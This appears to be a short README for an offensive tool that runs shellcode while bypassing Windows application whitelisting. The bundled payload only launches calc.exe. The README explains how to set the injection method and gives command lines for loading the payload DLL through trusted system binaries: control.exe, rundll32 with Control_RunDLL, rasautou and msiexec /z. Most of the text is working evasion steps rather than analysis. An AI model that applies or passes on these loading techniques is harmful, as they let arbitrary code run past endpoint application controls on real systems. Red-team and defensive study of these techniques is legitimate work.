Shellcode runner for all application whitelisting bypasses. The shellcode included in this project spawns calc.exe.
If desired, change the injection type by modifying the following line to the appropriate injection type
public const ExecutionMethod method = ExecutionMethod.CreateThread;
Running the DLL with the following legitimate exes
Export: CPlApplet
Syntax: Rename compiled “dll” extension to “cpl” and just double click it!
Control.exe [cplfile]
Rundll32.exe Shell32.dll, Control_RunDLL [cplfile]
Export: powershell
rasautou –d {dllpayload} –p powershell –a a –e e
Export: DllUnregisterServer
msiexec /z {full path to msiexec.dll}